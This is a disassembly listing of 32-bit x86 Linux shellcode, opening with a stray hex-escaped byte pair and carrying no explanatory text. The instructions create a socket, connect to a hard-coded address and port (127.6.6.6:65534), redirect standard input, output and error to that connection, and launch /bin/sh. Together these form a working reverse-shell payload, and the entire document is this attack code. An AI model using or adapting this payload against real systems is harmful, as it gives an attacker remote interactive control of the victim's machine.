\x31\xdb

   0:	31 db                	xor    %ebx,%ebx
   2:	43                   	inc    %ebx
   3:	6a 06                	push   $0x6
   5:	53                   	push   %ebx
   6:	6a 02                	push   $0x2
   8:	89 e1                	mov    %esp,%ecx
   a:	6a 66                	push   $0x66
   c:	58                   	pop    %eax
   d:	cd 80                	int    $0x80
   f:	89 c6                	mov    %eax,%esi
  11:	99                   	cltd   
  12:	52                   	push   %edx
  13:	89 e0                	mov    %esp,%eax
  15:	c6 40 01 14          	movb   $0x14,0x1(%eax)
  19:	58                   	pop    %eax
  1a:	43                   	inc    %ebx
  1b:	52                   	push   %edx
  1c:	66 50                	push   %ax
  1e:	66 53                	push   %bx
  20:	89 e0                	mov    %esp,%eax
  22:	6a 10                	push   $0x10
  24:	50                   	push   %eax
  25:	56                   	push   %esi
  26:	89 e1                	mov    %esp,%ecx
  28:	6a 66                	push   $0x66
  2a:	58                   	pop    %eax
  2b:	cd 80                	int    $0x80
  2d:	68 7f 06 06 06       	push   $0x606067f
  32:	66 68 ff fe          	pushw  $0xfeff
  36:	66 53                	push   %bx
  38:	89 e1                	mov    %esp,%ecx
  3a:	6a 10                	push   $0x10
  3c:	51                   	push   %ecx
  3d:	56                   	push   %esi
  3e:	89 e1                	mov    %esp,%ecx
  40:	43                   	inc    %ebx
  41:	6a 66                	push   $0x66
  43:	58                   	pop    %eax
  44:	cd 80                	int    $0x80
  46:	99                   	cltd   
  47:	89 d1                	mov    %edx,%ecx
  49:	89 f3                	mov    %esi,%ebx
  4b:	6a 3f                	push   $0x3f
  4d:	58                   	pop    %eax
  4e:	cd 80                	int    $0x80
  50:	41                   	inc    %ecx
  51:	89 c3                	mov    %eax,%ebx
  53:	6a 3f                	push   $0x3f
  55:	58                   	pop    %eax
  56:	cd 80                	int    $0x80
  58:	41                   	inc    %ecx
  59:	89 c3                	mov    %eax,%ebx
  5b:	6a 3f                	push   $0x3f
  5d:	58                   	pop    %eax
  5e:	cd 80                	int    $0x80
  60:	52                   	push   %edx
  61:	68 6e 2f 73 68       	push   $0x68732f6e
  66:	68 2f 2f 62 69       	push   $0x69622f2f
  6b:	89 e3                	mov    %esp,%ebx
  6d:	52                   	push   %edx
  6e:	53                   	push   %ebx
  6f:	89 e1                	mov    %esp,%ecx
  71:	6a 0b                	push   $0xb
  73:	58                   	pop    %eax
  74:	cd 80                	int    $0x80